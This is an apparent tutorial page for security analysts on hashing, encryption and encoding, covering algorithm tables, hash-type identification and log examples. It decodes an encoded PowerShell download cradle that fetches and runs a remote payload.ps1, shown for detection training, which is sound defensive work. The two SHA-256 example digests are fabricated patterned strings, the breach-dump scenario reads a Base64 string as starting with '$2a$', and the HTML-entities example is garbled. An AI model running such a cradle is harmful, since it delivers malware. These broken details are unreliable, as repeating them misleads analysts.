Fundamentals
T1003, T1555Hashing vs Encryption vs Encoding
The critical differences between hashing, encryption, and encoding — algorithm comparisons, real-world use cases, breach analysis applications, and concepts every analyst must understand to interpret logs and talk to engineering teams.
View on Graph
The Three Concepts — Hashing, Encryption, Encoding
These three concepts are the most commonly confused terms in security. Analysts who use them incorrectly lose credibility with engineering teams and make mistakes in investigations. Each serves a fundamentally different purpose:
| Concept | Direction | Key Required? | Deterministic? | Reversible? | Purpose |
|---|---|---|---|---|---|
| Hashing | One-way | No | Yes (same input = same hash) | No (mathematically infeasible) | Integrity verification, password storage |
| Encryption | Two-way | Yes (symmetric or asymmetric) | No (salt, IV, or randomness) | Yes (with the key) | Confidentiality |
| Encoding | Both directions | No | Yes (always) | Yes (trivial — anyone can decode) | Data format transformation |
The Critical Distinction
Hashing is a one-way mathematical function. You feed in data, you get a fixed-length digest. Given the digest, you cannot recover the original data (except by brute-forcing inputs and comparing). Example: password storage in /etc/shadow.
Encryption is a two-way function with a key. You feed in plaintext + key, you get ciphertext. Given the ciphertext + key, you recover the plaintext. Example: TLS, BitLocker, PGP.
Encoding is a format transformation. Base64, hex, and URL encoding change how data is represented. No secrecy is involved — encoding is not security. Analysts see encoded data (especially Base64) and mistake it for hash values or encrypted data. A Base64 string can be decoded in seconds with echo "cGFzc3dvcmQ=" | base64 -d.
Hashing — One-Way Integrity Verification
How Hashing Works
A hash function takes any input (a file, a password, a message) and produces a fixed-length output called a digest or hash value. The same input always produces the same output. Even a single bit change in the input produces a completely different hash (the avalanche effect).
Input: "password123"
SHA-256: ef92b778bafe771f8920b7f8c6c6a2b4e9f8c7a6b5d4e3f2a1b0c9d8e7f6a5b4
Input: "Password123" (capital P)
SHA-256: a6b5c4d3e2f1a0b9c8d7e6f5a4b3c2d1e0f9a8b7c6d5e4f3a2b1c0d9e8f7a6
Common Hash Algorithms — Comparison
| Algorithm | Digest Size | Security Status | Use Case |
|---|---|---|---|
| MD5 | 128 bits (32 hex chars) | Broken — collision attacks are trivial (2012 FLAME malware, 2017 forged certificates) | Legacy compatibility only. Do not use for security. |
| SHA-1 | 160 bits (40 hex chars) | Broken — SHAttered attack (2017) demonstrated practical collision | Deprecated. Avoid in all security contexts. |
| SHA-256 | 256 bits (64 hex chars) | Secure | The current standard. Password hashing (when combined with salt), file integrity, TLS certificates, blockchain. |
| SHA-512 | 512 bits (128 hex chars) | Secure | Stronger but slower. Useful when hash collisions must be absolutely prevented. |
| SHA-3 | Variable (224/256/384/512) | Secure | Newest NIST standard. Different internal structure than SHA-2. Future-proofing. |
| bcrypt | Variable (depends on cost) | Secure | Designed for password hashing. Includes embedded salt and configurable work factor. Slower than SHA-256 (good for passwords). |
| scrypt | Variable | Secure | Password hashing designed to be memory-hard (resists GPU/ASIC cracking). |
| Argon2id | Variable | Secure (recommended by OWASP) | Winner of the 2015 Password Hashing Competition. Current best practice for password storage. Memory-hard, time-hard, parallelizable. |
Password Hashing — The Right Way
When investigating a credential theft, the first question is: were the passwords properly hashed?
Bad (reversible or trivial):
$ echo "base64" && echo "cGFzc3dvcmQ=" | base64 -d
password
Base64 is not hashing. Scanning a breach dump for Base64 means the site stored passwords in plaintext.
Better but still wrong:
plaintext password → MD5 → 5f4dcc3b5aa765d61d8327deb882cf99
MD5 is fast. An attacker can compute ~10 billion MD5 hashes per second on a modern GPU. A RockYou wordlist cracks MD5 passwords in seconds.
Good:
plaintext password + unique salt + bcrypt → $2a$10$N9qo8uLOickgx2ZMRZoMyeIjZAgcfl7p92ldGxad68LJZdL17lhWy
The $2a$ prefix identifies bcrypt. 10 is the cost factor (2^10 rounds). The salt is embedded in the output. Each password gets a different salt, so precomputed rainbow tables are useless.
Identifying Hash Types in Breach Data
When you see a hash in a breach report, identify the algorithm by format:
| Format | Likely Algorithm | Length (hex chars) |
|---|---|---|
$1$salt$hash | MD5-crypt (Unix) | Variable |
$2a$ / $2b$ / $2y$ | bcrypt | Variable (includes cost + salt) |
$5$ | SHA-256-crypt (Unix) | Variable |
$6$ | SHA-512-crypt (Unix) | Variable |
MD5:hash | MD5 (OpenLDAP) | 32 hex chars |
{SSHA}base64hash | Salted SHA-1 (LDAP) | Variable (Base64) |
| 32 hex characters | MD4 (NTLM), MD5, or MD2 | 32 |
| 40 hex characters | SHA-1 | 40 |
| 64 hex characters | SHA-256 | 64 |
$argon2id$v=19$... | Argon2id | Variable |
Tools like hashid and hash-identifier can automatically detect hash types.
Encryption — Two-Way with a Key
Types of Encryption
Symmetric Encryption — Same key for encryption and decryption.
| Algorithm | Key Size | Security | Use Case |
|---|---|---|---|
| AES-128 | 128 bits | Secure | Disk encryption (BitLocker, FileVault), TLS, Wi-Fi (WPA2). Fast, hardware-accelerated on modern CPUs. |
| AES-256 | 256 bits | Secure | Highest standard. Required for US government classified data (NSA Suite B). Slightly slower than AES-128. |
| ChaCha20 | 256 bits | Secure | Modern stream cipher. Preferred over AES on mobile devices (no hardware AES). Used in TLS 1.3, WireGuard, SSH. |
| DES | 56 bits | Broken | 56-bit keys can be brute-forced in < 24 hours. Do not use. |
| 3DES | 112 bits | Deprecated | Vulnerable to Sweet32 attack (2016). Do not use. |
| Blowfish | 32-448 bits | Weak (block size) | 64-bit block size makes it vulnerable to birthday attacks at ~32 GB data. Use AES instead. |
| Twofish | 128-256 bits | Secure | AES finalist. Less common but still secure. |
Asymmetric Encryption — Public/private key pair. Public key encrypts, private key decrypts.
| Algorithm | Key Size | Security | Use Case |
|---|---|---|---|
| RSA | 2048-4096 bits | Secure at 2048+ | TLS certificates, PGP, SSH (legacy). Slow — typically used to encrypt symmetric keys. |
| ECC | 256-521 bits | Secure | Modern alternative to RSA. Much smaller keys (256-bit ECC = 3072-bit RSA). Used in TLS 1.3, SSH (Ed25519), Bitcoin. |
| DSA | 1024-3072 bits | Deprecated | Old NIST standard. Largely replaced by ECDSA. |
| Diffie-Hellman | 2048+ bits | Secure (with proper groups) | Key exchange only — not encryption. Foundation of TLS key agreement. |
Real-World Encryption Examples
TLS — Transport Layer Security
- Client connects to
https:// - Server sends its RSA or ECDSA certificate (signed by a CA)
- Client and server perform key exchange (ECDHE handshake)
- Result: a symmetric AES-256 or ChaCha20 session key shared between client and server
- All data encrypted for the duration of the session
Disk Encryption (BitLocker)
- Writes: data encrypted with AES-128/256 before writing to disk
- Reads: data decrypted from disk into memory
- Key: TPM-protected or recovery key
- Protects against: physical theft of the drive, cold boot attacks (partially), offline OS modification
PGP / Age
- File encrypted with symmetric key, symmetric key encrypted with recipient’s public key
- Only the recipient’s private key can decrypt the symmetric key, which decrypts the file
- Real-world: secure file transfer, encrypted email, Git commit signing
Encoding — Just a Format Change
Encoding is not security. It is a transformation between data formats so that binary data can be transmitted over text-based protocols or displayed safely in various contexts.
Common Encoding Schemes
| Scheme | Purpose | Example (output of “password”) |
|---|---|---|
| Base64 | Binary → ASCII for safe transmission over text protocols | cGFzc3dvcmQ= |
| Hex | Binary → hexadecimal representation | 70617373776f7264 |
| URL encoding | Special characters in URLs | passw%6Frd (o → %6F) |
| HTML entities | Prevent HTML injection | <script> for <script> |
| Unicode escapes | Escaping special Unicode characters | \u0070\u0061\u0073... |
What Analysts Commonly See
Base64 in logs: PowerShell commands are often Base64-encoded. -EncodedCommand followed by a Base64 string is an immediate escalation indicator.
powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=
Decode it:
echo 'SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgAyAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=' | base64 -d | iconv -f UTF-16LE -t UTF-8
Result:
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2/payload.ps1')
Hex in memory dumps: Memory forensics tools display strings in hex. A string 65 78 70 6C 6F 72 65 72 in a memory dump decodes to “explorer” — useful for identifying process names.
URL encoding in proxy logs: %68%74%74%70%73%3A%2F%2F decodes to https:// — useful for identifying obfuscated URLs in proxy logs.
Putting It All Together — Analysts’ Quick Reference
Scenario: You Find JDJhJDEwJE5ROW5qOHVMT2lj... in a Data Breach Dump
- Check format. It starts with
$2a$→ bcrypt hash. Good — password was properly hashed. - If it starts with
cGFzc3dvcmQ=→ Base64. Not hashed — the site stored plaintext credentials encoded as Base64. Immediate escalation. - If it starts with
5f4dcc3b5aa765d61d8327deb882cf99(32 hex chars) → MD5 or NTLM. Weak — likely crackable, but at least the site stored a hash.
Scenario: You See an Encrypted Communication Log
- Protocol: TLS 1.3 with TLS_AES_256_GCM_SHA384 → strong. No payload visibility, but that’s expected.
- Protocol: TLS 1.0 with TLS_RSA_WITH_RC4_128_SHA → weak. Deprecated cipher suite needs remediation.
- If you see the plaintext in the log alongside the ciphertext → logging at the wrong layer. The application decrypted before logging.
Related
- Active Directory Basics — covers the active directory basics concepts
- AWS Misconfigurations — detection and response for T1525, T1613 techniques
- Cloud Security Fundamentals — detection and response for T1525 techniques
